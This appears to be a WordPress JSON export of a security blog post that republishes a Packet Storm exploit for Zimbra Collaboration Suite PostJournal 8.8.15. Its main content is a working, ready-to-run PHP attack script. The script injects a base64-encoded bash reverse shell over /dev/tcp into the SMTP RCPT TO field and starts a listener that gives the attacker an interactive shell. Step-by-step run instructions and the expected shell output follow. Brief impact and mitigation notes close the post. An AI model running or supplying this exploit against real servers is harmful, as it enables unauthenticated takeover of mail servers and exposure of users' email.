{"id":27753,"date":"2025-11-26T12:50:44","date_gmt":"2025-11-26T12:50:44","guid":{"rendered":"http:\/\/localhost\/?p=27753"},"modified":"2025-11-26T12:50:44","modified_gmt":"2025-11-26T12:50:44","slug":"zimbra-collaboration-suite-postjournal-8815-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=27753","title":{"rendered":"\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution_PACKETSTORM:212108"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:14:02&#8243;,&#8221;description&#8221;:&#8221;Zimbra Collaboration Suite Postjournal version 8.8.15 unauthenticated proof of concept remote code execution exploit that leverages SMTP injection&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212108&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Zimbra Collaboration Suite Postjournal 8.8.15 Unauthenticated RCE                                                           |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.zimbra.com\/                                                                                                     |\\n    =============================================================================================================================================\\n    \\n    POC : \\n    \\n    1. Overview\\n    &#8212;&#8212;&#8212;&#8211;\\n    A critical vulnerability exists in the Zimbra Collaboration Suite (ZCS) PostJournal service that allows attackers to execute arbitrary system commands without authentication. \\n    The vulnerability is triggered through SMTP injection using a malicious RCPT TO parameter. This exploit provides full remote command execution (RCE) as the Zimbra user, enabling an attacker to gain a reverse shell.\\n    \\n    The root cause is improper sanitization of user-controlled email fields inside the PostJournal processing mechanism.\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    2. Vulnerability Details\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    The PostJournal service processes incoming emails and interacts with external components. Due to a command injection flaw in the way Zimbra handles the RCPT TO address, attackers can inject shell commands using syntax such as:\\n    \\n        RCPT TO:\\u003caabbb$(COMMAND)@domain.com\\u003e\\n    \\n    Zimbra interprets the `$()` expression as a shell command and executes it under the mail server context.\\n    \\n    This leads to full RCE.\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    3. Requirements\\n    &#8212;&#8212;&#8212;&#8212;&#8212;\\n    \u2022 ZCS installation (vulnerable version)  \\n    \u2022 SMTP access reachable externally  \\n    \u2022 No authentication required  \\n    \u2022 Attacker\u2019s listener ready to receive reverse shell  \\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    4. Proof of Concept (PoC)\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    The exploit uses standard SMTP commands:\\n    \\n        EHLO localhost\\n        MAIL FROM:\\u003crandom@test.com\\u003e\\n        RCPT TO:\\u003caabbb$(payload)@test.com\\u003e\\n        DATA\\n        Test\\n        .\\n        QUIT\\n    \\n    The payload is a Base64\u2011encoded reverse shell executed via:\\n    \\n        echo BASE64 | base64 -d | bash\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    5. PHP Exploit Code\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    The following PHP PoC sends the exploit to Zimbra and creates a built\u2011in TCP listener without using `pcntl_fork()`:\\n    \\n    \\u003c?php\\n    set_time_limit(0);\\n    error_reporting(E_ALL);\\n    ob_implicit_flush(true);\\n    \\n    class SMTPExploit {\\n        private $target;\\n        private $port;\\n        private $lhost;\\n        private $lport;\\n        private $mail_from;\\n        private $rcpt_to;\\n        private $sock;\\n        private $command;\\n    \\n        public function __construct($target, $port, $lhost, $lport) {\\n            $this-\\u003etarget = $target;\\n            $this-\\u003eport = $port;\\n            $this-\\u003elhost = $lhost;\\n            $this-\\u003elport = $lport;\\n    \\n            $this-\\u003email_from = $this-\\u003erandom_email();\\n            $this-\\u003ercpt_to = $this-\\u003erandom_email();\\n            $this-\\u003ecommand = $this-\\u003egenerate_b64_shell();\\n        }\\n    \\n        private function random_email() {\\n            return substr(md5(rand()), 0, 8).\\&#8221;@test.com\\&#8221;;\\n        }\\n    \\n        private function generate_b64_shell() {\\n            $cmd = \\&#8221;\/bin\/bash -i 5\\u003c\\u003e \/dev\/tcp\/{$this-\\u003elhost}\/{$this-\\u003elport} 0\\u003c\\u00265 1\\u003e\\u00265 2\\u003e\\u00265\\&#8221;;\\n            $b64 = base64_encode($cmd);\\n            return \\&#8221;echo ${b64}|base64 -d|bash\\&#8221;;\\n        }\\n    \\n        private function injected_rcpt() {\\n            return \\&#8221;aabbb\\\\$({$this-\\u003ecommand})@{$this-\\u003ercpt_to}\\&#8221;;\\n        }\\n    \\n        private function connect() {\\n            $this-\\u003esock = fsockopen($this-\\u003etarget, $this-\\u003eport, $e, $s, 10);\\n            if (!$this-\\u003esock) die(\\&#8221;[!] Cannot connect to SMTP server\\\\n\\&#8221;);\\n            fgets($this-\\u003esock, 4096);\\n        }\\n    \\n        private function send($cmd) {\\n            fwrite($this-\\u003esock, $cmd.\\&#8221;\\\\r\\\\n\\&#8221;);\\n            return fgets($this-\\u003esock, 4096);\\n        }\\n    \\n        public function run() {\\n            echo \\&#8221;[*] Connecting to SMTP&#8230;\\\\n\\&#8221;;\\n            $this-\\u003econnect();\\n    \\n            $this-\\u003esend(\\&#8221;EHLO localhost\\&#8221;);\\n            $this-\\u003esend(\\&#8221;MAIL FROM:\\u003c{$this-\\u003email_from}\\u003e\\&#8221;);\\n    \\n            $inj = $this-\\u003einjected_rcpt();\\n            $this-\\u003esend(\\&#8221;RCPT TO:\\u003c{$inj}\\u003e\\&#8221;);\\n    \\n            $this-\\u003esend(\\&#8221;DATA\\&#8221;);\\n            fwrite($this-\\u003esock, \\&#8221;Test\\\\r\\\\n.\\\\r\\\\n\\&#8221;);\\n    \\n            $this-\\u003esend(\\&#8221;QUIT\\&#8221;);\\n            fclose($this-\\u003esock);\\n    \\n            echo \\&#8221;[+] Exploit Sent.\\\\n\\&#8221;;\\n        }\\n    }\\n    \\n    class Listener {\\n        private $host;\\n        private $port;\\n    \\n        public function __construct($h, $p) {\\n            $this-\\u003ehost = $h;\\n            $this-\\u003eport = $p;\\n        }\\n    \\n        public function start() {\\n            echo \\&#8221;[*] Starting listener on {$this-\\u003ehost}:{$this-\\u003eport}\\\\n\\&#8221;;\\n    \\n            $sock = stream_socket_server(\\&#8221;tcp:\/\/{$this-\\u003ehost}:{$this-\\u003eport}\\&#8221;, $e, $s);\\n            if (!$sock) die(\\&#8221;[!] Cannot start listener\\\\n\\&#8221;);\\n    \\n            while (true) {\\n                $client = @stream_socket_accept($sock, 1);\\n                if ($client) {\\n                    echo \\&#8221;[+] Connection received\\\\n\\&#8221;;\\n                    $this-\\u003einteractive($client);\\n                    fclose($client);\\n                }\\n            }\\n        }\\n    \\n        private function interactive($client) {\\n            fwrite($client, \\&#8221;Connected!\\\\n\\u003e \\&#8221;);\\n    \\n            while (!feof($client)) {\\n                $cmd = trim(fgets($client));\\n    \\n                if ($cmd === \\&#8221;exit\\&#8221;) break;\\n    \\n                $out = shell_exec($cmd);\\n                fwrite($client, $out . \\&#8221;\\\\n\\u003e \\&#8221;);\\n            }\\n        }\\n    }\\n    \\n    $target = $argv[1] ?? \\&#8221;127.0.0.1\\&#8221;;\\n    $port   = $argv[2] ?? 25;\\n    $lhost  = $argv[3] ?? \\&#8221;0.0.0.0\\&#8221;;\\n    $lport  = $argv[4] ?? 4444;\\n    \\n    echo \\&#8221;[*] Launching listener thread&#8230;\\\\n\\&#8221;;\\n    \\n    $listener = new Listener($lhost, $lport);\\n    \\n    $listener_running = false;\\n    $exploit_sent = false;\\n    \\n    while (true) {\\n    \\n        if (!$listener_running) {\\n            echo \\&#8221;[*] Listener online&#8230;\\\\n\\&#8221;;\\n            $listener_running = true;\\n            $listener-\\u003estart();\\n        }\\n    \\n        if (!$exploit_sent) {\\n            echo \\&#8221;[*] Sending exploit&#8230;\\\\n\\&#8221;;\\n            $e = new SMTPExploit($target, $port, $lhost, $lport);\\n            $e-\\u003erun();\\n            $exploit_sent = true;\\n        }\\n    \\n        usleep(10000);\\n    }\\n    \\n    ?\\u003e\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    How to Run the Exploit\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    ### **1. Save the script**\\n    Save the code as:\\n    \\n        zimbra_rce.php\\n    \\n    ### **2. Start it from terminal**\\n    Windows example:\\n    \\n        php zimbra_rce.php 192.168.1.50 25 192.168.1.10 4444\\n    \\n    Linux example:\\n    \\n        php zimbra_rce.php mail.example.com 25 attacker-ip 4444\\n    \\n    ### **Arguments format:**\\n    \\n    | Argument | Description |\\n    |&#8212;&#8212;&#8212;|&#8212;&#8212;&#8212;&#8212;-|\\n    | 1       | Target Zimbra SMTP IP |\\n    | 2       | SMTP port (default 25) |\\n    | 3       | Attacker listener IP |\\n    | 4       | Listener port |\\n    \\n    ### **3. Wait for Shell**\\n    If the server is vulnerable, you will see:\\n    \\n        [*] Listener online&#8230;\\n        [*] Sending exploit&#8230;\\n        [+] Exploit Sent.\\n        [+] Connection received\\n        Connected!\\n        \\u003e\\n    \\n    Now you have a remote shell.\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    6. Impact\\n    &#8212;&#8212;&#8212;\\n    \u2022 Full remote command execution  \\n    \u2022 Full server compromise possible  \\n    \u2022 Email data exposure  \\n    \u2022 Privilege escalation (depending on system configuration)  \\n    \u2022 Lateral movement inside the network  \\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    7. Mitigation\\n    &#8212;&#8212;&#8212;&#8212;-\\n    Until patches are applied:\\n    \\n    \u2022 Block external SMTP access to PostJournal component  \\n    \u2022 Apply strict sanitization rules for RCPT field  \\n    \u2022 Monitor suspicious SMTP activity  \\n    \u2022 Restrict Zimbra service user privileges  \\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    8. Conclusion\\n    &#8212;&#8212;&#8212;&#8212;-\\n    This vulnerability presents a severe risk and must be mitigated immediately.  \\n    The exploit demonstrates how a simple SMTP injection can lead to full RCE, highlighting the need for strict input validation in email\u2011processing systems.\\n    \\n    \\n    \\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212108&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212108\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:14:02&#8243;,&#8221;description&#8221;:&#8221;Zimbra Collaboration Suite Postjournal version 8.8.15 unauthenticated proof of concept remote code execution exploit that leverages SMTP injection&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-27753","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution_PACKETSTORM:212108 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=27753\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution_PACKETSTORM:212108 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:14:02&#8243;,&#8221;description&#8221;:&#8221;Zimbra Collaboration Suite Postjournal version 8.8.15 unauthenticated proof of concept remote code execution exploit that leverages SMTP injection&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=27753\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-26T12:50:44+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27753#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27753\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution_PACKETSTORM:212108\",\"datePublished\":\"2025-11-26T12:50:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27753\"},\"wordCount\":1276,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27753#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27753\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27753\",\"name\":\"\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution_PACKETSTORM:212108 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-26T12:50:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27753#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27753\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27753#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution_PACKETSTORM:212108\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution_PACKETSTORM:212108 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=27753","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution_PACKETSTORM:212108 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:14:02&#8243;,&#8221;description&#8221;:&#8221;Zimbra Collaboration Suite Postjournal version 8.8.15 unauthenticated proof of concept remote code execution exploit that leverages SMTP injection&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code...","og_url":"https:\/\/zero.redgem.net\/?p=27753","og_site_name":"zero redgem","article_published_time":"2025-11-26T12:50:44+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=27753#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=27753"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution_PACKETSTORM:212108","datePublished":"2025-11-26T12:50:44+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=27753"},"wordCount":1276,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=27753#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=27753","url":"https:\/\/zero.redgem.net\/?p=27753","name":"\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution_PACKETSTORM:212108 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-26T12:50:44+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=27753#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=27753"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=27753#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Zimbra Collaboration Suite Postjournal 8.8.15 Remote Code Execution_PACKETSTORM:212108"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27753","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27753"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27753\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27753"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=27753"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=27753"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}